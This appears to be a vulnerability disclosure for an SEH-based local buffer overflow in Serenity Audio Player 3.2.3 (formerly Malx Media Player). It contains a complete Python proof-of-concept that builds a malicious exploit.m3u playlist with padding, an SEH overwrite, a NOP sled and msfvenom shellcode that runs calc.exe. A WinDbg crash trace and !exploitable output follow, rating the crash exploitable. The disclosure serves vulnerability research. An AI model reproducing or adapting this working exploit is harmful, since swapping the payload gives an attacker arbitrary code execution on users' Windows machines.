Serenity is a playlist based audio player for Windows. It features a clean and simple interface with minimal overhead.Formats supported are limited only by CODECs and drivers installed on the machine SEH Local buffer overflow in Serenity Audio Player 3.2.3 (earlier known as Malx Media Player) Discovered by :Arjun Basnet from Cyber security works pvt. ltd Affected Version: Serenity Audio Player 3.2.3 Malx media player 3.2.2 Lower version also may be affected(Not Checked) software link: http://malsmith.kyabram.biz/serenity/ The vulnerability was tested on: Windows 7 and Windows XP SP2 also could work on other version of Windows( not checked) POC video link can be found below link: http://youtu.be/ZMC-URZagMg POC exploit code can be found below: ------------------------------------------------------------------------------------------------------------------------- import os # header buffer = "M3U" buffer += "#EXTM3" buffer += "A" * 1011 # JMP 6 bytes buffer +="\xEB\x06\x90\x90" buffer += "\xE3\x4A\x40\x00" buffer += "\x90" * 30 # msfvenom -p windows/exec EXITFUNC=seh CMD=calc.exe -f c -a x86 -b "\x0a\x1a" #Payload size: 220 bytes #BadCharacters: \x0a\x1a buffer += ("\xb8\xc2\x04\xed\x11\xd9\xc5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" "\x31\x31\x43\x13\x03\x43\x13\x83\xc3\xc6\xe6\x18\xed\x2e\x64" "\xe2\x0e\xae\x09\x6a\xeb\x9f\x09\x08\x7f\x8f\xb9\x5a\x2d\x23" "\x31\x0e\xc6\xb0\x37\x87\xe9\x71\xfd\xf1\xc4\x82\xae\xc2\x47" "\x00\xad\x16\xa8\x39\x7e\x6b\xa9\x7e\x63\x86\xfb\xd7\xef\x35" "\xec\x5c\xa5\x85\x87\x2e\x2b\x8e\x74\xe6\x4a\xbf\x2a\x7d\x15" "\x1f\xcc\x52\x2d\x16\xd6\xb7\x08\xe0\x6d\x03\xe6\xf3\xa7\x5a" "\x07\x5f\x86\x53\xfa\xa1\xce\x53\xe5\xd7\x26\xa0\x98\xef\xfc" "\xdb\x46\x65\xe7\x7b\x0c\xdd\xc3\x7a\xc1\xb8\x80\x70\xae\xcf" "\xcf\x94\x31\x03\x64\xa0\xba\xa2\xab\x21\xf8\x80\x6f\x6a\x5a" "\xa8\x36\xd6\x0d\xd5\x29\xb9\xf2\x73\x21\x57\xe6\x09\x68\x3d" "\xf9\x9c\x16\x73\xf9\x9e\x18\x23\x92\xaf\x93\xac\xe5\x2f\x76" "\x89\x14\xc1\x4b\x07\x80\x78\x3e\x6a\xcc\x7a\x94\xa8\xe9\xf8" "\x1d\x50\x0e\xe0\x57\x55\x4a\xa6\x84\x27\xc3\x43\xab\x94\xe4" "\x41\xc8\x7b\x77\x09\x21\x1e\xff\xa8\x3d") file = "exploit.m3u" f = open(file,"w") f.write(buffer) f.close() ---------------------------------------------------------------------------------------------------------------------------------- Stack Trace: Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 Copyright (c) Microsoft Corporation. All rights reserved. Symbol search path is: SRV*http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00400000 0040a000 image00400000 ModLoad: 7c900000 7c9af000 ntdll.dll |. . 0 id: 1418 create name: image00400000 ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll ModLoad: 10000000 100b9000 C:\WINDOWS\system32\rlls.dll ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll ModLoad: 74c80000 74cac000 C:\WINDOWS\system32\OLEACC.dll ModLoad: 76080000 760e5000 C:\WINDOWS\system32\MSVCP60.dll ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll ModLoad: 78050000 78120000 C:\WINDOWS\system32\WININET.dll ModLoad: 01ce0000 01ce9000 C:\WINDOWS\system32\Normaliz.dll ModLoad: 78000000 78045000 C:\WINDOWS\system32\iertutil.dll ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll (1418.1124): C++ EH exception - code e06d7363 (first chance) ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime ModLoad: 767f0000 76817000 C:\WINDOWS\system32\Schannel.dll ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\USERENV.dll ModLoad: 029a0000 029f8000 C:\WINDOWS\system32\LavasoftTcpService.dll ModLoad: 71a50000 71a8f000 C:\WINDOWS\system32\MSWSOCK.dll ModLoad: 76d60000 76d79000 C:\WINDOWS\system32\IPHLPAPI.DLL (1418.173c): Unknown exception - code c0000096 (first chance) (1418.173c): Unknown exception - code c0000096 (!!! second chance !!!) r eax=00000000 ebx=00000000 ecx=77c40ad6 edx=01ab0fe8 esi=00401270 edi=0012fbb7 eip=00400055 esp=0012fb90 ebp=0012fe18 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 *** WARNING: Unable to verify checksum for image00400000 *** ERROR: Module load completed but symbols could not be loaded for image00400000 image00400000+0x55: 00400055 6f outs dx,dword ptr [esi] ds:0023:00401270=0824448b rF fpcw=027F: rn 53 puozdi fpsw=4000: top=0 cc=1000 -------- fptw=FFFF fopcode=0000 fpip=001b:5ad72985 fpdp=0023:0012fb30 st0=-1.253621103784834226700e-1829 st1= 0.000000003250463689420e+1720 st2= 0.000000923709286317790e-4933 st3= 5.030055843417188097910e-4932 st4=-2.532331139691264054760e+3433 st5= 1.000000000000000000000e+0000 st6= 1.000000000000000000000e+0000 st7= 1.000000000000000000000e+0000 image00400000+0x55: 00400055 6f outs dx,dword ptr [esi] ds:0023:00401270=0824448b rX xmm0=0 1.8357e-043 -0.0146141 -1.02234 xmm1=-0.0146141 -1.52194e-005 -1.02234 -1.52193e-005 xmm2=1.4013e-045 -0.0147865 -1.522e-005 -1.00728 xmm3=1.74424e-039 -1.#QNAN 8.26766e-044 -1.52198e-005 xmm4=6.43282e+037 8.26766e-044 1.74228e-039 0 xmm5=4.90454e-044 1.74227e-039 8.15556e-043 3.78351e-044 xmm6=-1.52193e-005 3.02814e+016 0 1.74084e-039 xmm7=1.68436e-042 7.00649e-044 1.63952e-042 2.00015 image00400000+0x55: 00400055 6f outs dx,dword ptr [esi] ds:0023:00401270=0824448b kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0012fe18 7e418816 00401270 006d01f4 00000601 image00400000+0x55 0012fe80 7e4189cd 00000000 00401270 006d01f4 USER32!UserCallWinProcCheckWow+0x150 0012fee0 7e4196c7 0012ff0c 00000001 7e42fac4 USER32!DispatchMessageWorker+0x306 0012fef0 00401244 0012ff0c 0012ffc0 00000000 USER32!DispatchMessageA+0xf 0012ff24 00404ff6 00400000 00000000 0015eff3 image00400000+0x1244 0012ffc0 7c817067 00000000 00000000 7ffd9000 image00400000+0x4ff6 0012fff0 00000000 00404ec2 00000000 78746341 kernel32!BaseProcessStart+0x23 .load C:\peach\bin\msec.dll !exploitable -m IDENTITY:HostMachine\HostUser PROCESSOR:X86 CLASS:USER QUALIFIER:USER_PROCESS EVENT:DEBUG_EVENT_EXCEPTION EXCEPTION_FAULTING_ADDRESS:0x400055 EXCEPTION_CODE:0xC0000096 EXCEPTION_LEVEL:SECOND_CHANCE EXCEPTION_TYPE:STATUS_PRIVILEGED_INSTRUCTION MAJOR_HASH:0x5e212578 MINOR_HASH:0x3a4f4f12 STACK_DEPTH:7 STACK_FRAME:image00400000+0x55 STACK_FRAME:USER32!UserCallWinProcCheckWow+0x150 STACK_FRAME:USER32!DispatchMessageWorker+0x306 STACK_FRAME:USER32!DispatchMessageA+0xf STACK_FRAME:image00400000+0x1244 STACK_FRAME:image00400000+0x4ff6 STACK_FRAME:kernel32!BaseProcessStart+0x23 INSTRUCTION_ADDRESS:0x0000000000400055 INVOKING_STACK_FRAME:0 DESCRIPTION:Privileged Instruction Violation SHORT_DESCRIPTION:PrivilegedInstruction CLASSIFICATION:EXPLOITABLE BUG_TITLE:Exploitable - Privileged Instruction Violation starting at image00400000+0x0000000000000055 (Hash=0x5e212578.0x3a4f4f12) EXPLANATION:A privileged instruction exception indicates that the attacker controls execution flow.!msec.exploitable -m The call to LoadLibrary(msec) failed, Win32 error 0n127 "The specified procedure could not be found." Please check your debugger configuration and/or network access.